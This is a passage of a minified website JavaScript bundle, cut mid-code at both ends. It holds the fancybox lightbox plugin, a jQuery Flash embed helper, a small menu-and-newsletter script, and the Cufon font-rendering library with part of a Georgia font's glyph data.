fancybox_start();};$.fancybox.showActivity=function(){clearInterval(loadingTimer);loading.show();loadingTimer=setInterval(fancybox_animate_loading,66);};$.fancybox.hideActivity=function(){loading.hide();};$.fancybox.next=function(){return $.fancybox.pos(currentIndex+1);};$.fancybox.prev=function(){return $.fancybox.pos(currentIndex-1);};$.fancybox.pos=function(pos){if(busy){return;}
pos=parseInt(pos,10);if(pos>-1&&currentArray.length>pos){selectedIndex=pos;fancybox_start();}
if(currentOpts.cyclic&&currentArray.length>1&&pos<0){selectedIndex=currentArray.length-1;fancybox_start();}
if(currentOpts.cyclic&&currentArray.length>1&&pos>=currentArray.length){selectedIndex=0;fancybox_start();}
return;};$.fancybox.cancel=function(){if(busy){return;}
busy=true;$.event.trigger('fancybox-cancel');fancybox_abort();if(selectedOpts&&$.isFunction(selectedOpts.onCancel)){selectedOpts.onCancel(selectedArray,selectedIndex,selectedOpts);}
busy=false;};$.fancybox.close=function(){if(busy||wrap.is(':hidden')){return;}
busy=true;if(currentOpts&&$.isFunction(currentOpts.onCleanup)){if(currentOpts.onCleanup(currentArray,currentIndex,currentOpts)===false){busy=false;return;}}
fancybox_abort();$(close.add(nav_left).add(nav_right)).hide();$('#fancybox-title').remove();wrap.add(inner).add(overlay).unbind();$(window).unbind("resize.fb scroll.fb");$(document).unbind('keydown.fb');function _cleanup(){overlay.fadeOut('fast');wrap.hide();$.event.trigger('fancybox-cleanup');inner.empty();if($.isFunction(currentOpts.onClosed)){currentOpts.onClosed(currentArray,currentIndex,currentOpts);}
currentArray=selectedOpts=[];currentIndex=selectedIndex=0;currentOpts=selectedOpts={};busy=false;}
inner.css('overflow','hidden');if(currentOpts.transitionOut=='elastic'){start_pos=fancybox_get_zoom_from();var pos=wrap.position();final_pos={top:pos.top,left:pos.left,width:wrap.width(),height:wrap.height()};if(currentOpts.opacity){final_pos.opacity=1;}
fx.prop=1;$(fx).animate({prop:0},{duration:currentOpts.speedOut,easing:currentOpts.easingOut,step:fancybox_draw,complete:_cleanup});}else{wrap.fadeOut(currentOpts.transitionOut=='none'?0:currentOpts.speedOut,_cleanup);}};$.fancybox.resize=function(){var c,h;if(busy||wrap.is(':hidden')){return;}
busy=true;c=inner.wrapInner("<div style='overflow:auto'></div>").children();h=c.height();wrap.css({height:h+(currentOpts.padding*2)+titleh});inner.css({height:h});c.replaceWith(c.children());$.fancybox.center();};$.fancybox.center=function(){busy=true;var view=fancybox_get_viewport(),margin=currentOpts.margin,to={};to.top=view[3]+((view[1]-((wrap.height()-titleh)+(shadow*2)))*0.5);to.left=view[2]+((view[0]-(wrap.width()+(shadow*2)))*0.5);to.top=Math.max(view[3]+margin,to.top);to.left=Math.max(view[2]+margin,to.left);wrap.css(to);busy=false;};$.fn.fancybox.defaults={padding:10,margin:20,opacity:false,modal:false,cyclic:false,scrolling:'auto',width:560,height:340,autoScale:true,autoDimensions:true,centerOnScroll:false,ajax:{},swf:{wmode:'transparent'},hideOnOverlayClick:true,hideOnContentClick:false,overlayShow:true,overlayOpacity:0.3,overlayColor:'#666',titleShow:true,titlePosition:'outside',titleFormat:null,transitionIn:'fade',transitionOut:'fade',speedIn:300,speedOut:300,changeSpeed:300,changeFade:'fast',easingIn:'swing',easingOut:'swing',showCloseButton:true,showNavArrows:true,enableEscapeButton:true,onStart:null,onCancel:null,onComplete:null,onCleanup:null,onClosed:null};$(document).ready(function(){fancybox_init();});})(jQuery);;(function(F,C){var D=function(H){var G,I=[];for(G in H){if(/string|number/.test(typeof H[G])&&H[G]!==""){I.push(G+'="'+H[G]+'"')}}return I[A]("")},E=function(I){var G,K,J=[],H;if(typeof I=="object"){for(G in I){if(typeof I[G]=="object"){H=[];for(K in I[G]){H.push([K,"=",encodeURIComponent(I[G][K])][A](""))}I[G]=H[A]("&amp;")}if(I[G]){J.push(['<param name="',G,'" value="',I[G],'" />'][A](""))}}I=J[A]("")}return I},B=false,A="join";F[C]=(function(){try{var G="0,0,0",H=navigator.plugins["Shockwave Flash"]||ActiveXObject;G=H.description||(function(){try{return(new H("ShockwaveFlash.ShockwaveFlash")).GetVariable("$version")}catch(J){}}())}catch(I){}G=G.match(/^[A-Za-z\s]*?(\d+)[\.|,](\d+)(?:\s+[d|r]|,)(\d+)/);return{available:G[1]>0,activeX:H&&!H.name,version:{major:G[1]*1,minor:G[2]*1,release:G[3]*1},hasVersion:function(K){var N=this.version,L="major",M="minor",J="release";K=(/string|number/.test(typeof K))?K.toString().split("."):K||[0,0,0];K=[K[L]||K[0]||N[L],K[M]||K[1]||N[M],K[J]||K[2]||N[J]];return(K[0]<N[L])||(K[0]==N[L]&&K[1]<N[M])||(K[0]==N[L]&&K[1]==N[M]&&K[2]<=N[J])},expressInstall:"expressInstall.swf",create:function(J){if(!F[C].available||B||!typeof J=="object"||!J.swf){return false}if(J.hasVersion&&!F[C].hasVersion(J.hasVersion)){J={swf:J.expressInstall||F[C].expressInstall,attrs:{id:J.id||"SWFObjectExprInst",name:J.name,height:Math.max(J.height||137),width:Math.max(J.width||214)},params:{flashvars:{MMredirectURL:location.href,MMplayerType:(F[C].activeX)?"ActiveX":"PlugIn",MMdoctitle:document.title.slice(0,47)+" - Flash Player Installation"}}};B=true}else{J=F.extend(true,{attrs:{id:J.id,name:J.name,height:J.height||180,width:J.width||320},params:{wmode:J.wmode||"opaque",flashvars:J.flashvars}},J)}if(F[C].activeX){J.attrs.classid=J.attrs.classid||"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000";J.params.movie=J.params.movie||J.swf}else{J.attrs.type=J.attrs.classid||"application/x-shockwave-flash";J.attrs.data=J.attrs.data||J.swf}return["<object ",D(J.attrs),">",E(J.params),"</object>"][A]("")}}}());F.fn[C]=function(G){if(typeof G=="object"){this.each(function(){var I=document.createElement(C);var H=F[C].create(G);if(H){I.innerHTML=H;if(I.childNodes[0]){this.appendChild(I.childNodes[0])}}})}else{if(typeof G=="function"){this.find("object").andSelf().filter("object").each(function(){var I=this,H="jsInteractionTimeoutMs";I[H]=I[H]||0;if(I[H]<660){if(I.clientWidth||I.clientHeight){G.call(this)}else{setTimeout(function(){F(I)[C](G)},I[H]+66)}}})}}return this}}(jQuery,"flash"));;$(document).ready(function(){$("ul#menu a").html("<span></span>");$("ul#menu a").css({"display":"block"});$("ul#menu span").css("opacity","0");$("ul#menu span").hover(function(){$(this).stop().animate({opacity:1},"fast");},function(){$(this).stop().animate({opacity:0},"slow");});$("#newsletter_bot").fancybox({overlayShow:true,transitionIn:'elastic',autoDimensions:false,padding:10,width:280,height:340});$("#newsletter_bot_2").click(function(){$("#newsletter_bot").click();});$("#newsletter_form").bind("submit",function(){$.fancybox.showActivity();var data=$(this).serializeArray();$.ajax({type:"POST",cache:false,url:"/addnews",data:data,success:function(data){$.fancybox(data);$(':input',"#newsletter_form").each(function(){var type=this.type;var tag=this.tagName.toLowerCase();if(type=='text'||type=='password'||tag=='textarea')
this.value="";else if(type=='checkbox'||type=='radio')
this.checked=false;else if(tag=='select')
this.selectedIndex=-1;});}});return false;});});function Redireciona(opcao)
{location.href=opcao;}
function clearInput(field_id,term_to_clear){if(document.getElementById(field_id).value==term_to_clear){document.getElementById(field_id).value='';}
else if(document.getElementById(field_id).value==''){document.getElementById(field_id).value=term_to_clear;}};var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I-1]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return!!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());;
/*
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface and data copyright 1996 Microsoft Corporation. All Rights Reserved.
 * 
 * Trademark:
 * Georgia is a trademark of Microsoft Corporation.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"153,-301v18,0,22,-11,27,-24r11,4v-5,39,-55,56,-87,28v-19,-10,-32,7,-37,21r-10,-5v8,-19,18,-41,44,-42v25,-1,32,18,52,18xm51,-28v1,11,22,16,36,16r0,12r-94,0r0,-12v20,-4,34,-13,41,-31r82,-210r14,0r89,226v5,9,18,14,31,15r0,12r-104,0r0,-12v15,-3,36,-1,30,-18r-20,-56r-88,0v-7,20,-15,36,-17,58xm149,-102r-38,-97r-37,97r75,0","w":241},{"d":"145,-14v92,0,67,-114,64,-197v-1,-21,-23,-23,-41,-26r0,-12r101,0r0,12v-66,-2,-35,103,-40,164v-5,52,-39,79,-90,79v-52,0,-93,-23,-93,-72r0,-147v2,-19,-18,-22,-33,-24r0,-12r104,0r0,12v-16,2,-35,4,-34,22v7,81,-30,201,62,201","w":272},{"d":"139,-174v0,25,-7,54,25,50r0,10v-21,11,-49,6,-53,-16v-18,28,-84,32,-84,-13v0,-47,56,-43,85,-60v6,-32,-25,-51,-47,-33v5,17,1,31,-17,30v-10,1,-14,-9,-14,-17v0,-19,31,-32,52,-32v51,0,53,34,53,81xm73,-174v-20,9,-21,49,6,47v16,-1,24,-8,32,-15r1,-47v-14,4,-27,9,-39,15","w":180},{"d":"40,-303v-13,-12,5,-33,22,-23r56,54r-5,7v-24,-13,-54,-21,-73,-38xm14,-12v14,-3,37,0,37,-21r0,-181v1,-19,-21,-20,-37,-23r0,-12r112,0r0,12v-18,1,-37,2,-37,22r0,180v-1,20,20,21,37,23r0,12r-112,0r0,-12","w":140},{"d":"118,-238v18,0,22,-11,27,-24r11,4v-5,39,-55,56,-87,28v-19,-10,-32,7,-37,21r-10,-5v8,-19,18,-41,44,-42v26,-1,31,18,52,18xm148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53","w":181},{"d":"60,-246v-9,-15,9,-32,24,-21v19,22,26,38,46,66r-7,6","w":180},{"d":"105,-15v26,0,37,-12,49,-33r13,7v-14,25,-37,46,-72,46v-55,0,-82,-37,-82,-93v0,-51,28,-90,79,-90v51,0,72,33,70,86r-114,0v0,44,14,77,57,77xm128,-107v-1,-29,-6,-58,-36,-58v-29,1,-43,26,-44,58r80,0xm131,-261v12,0,20,10,21,21v0,11,-9,22,-21,22v-12,0,-21,-10,-21,-22v0,-12,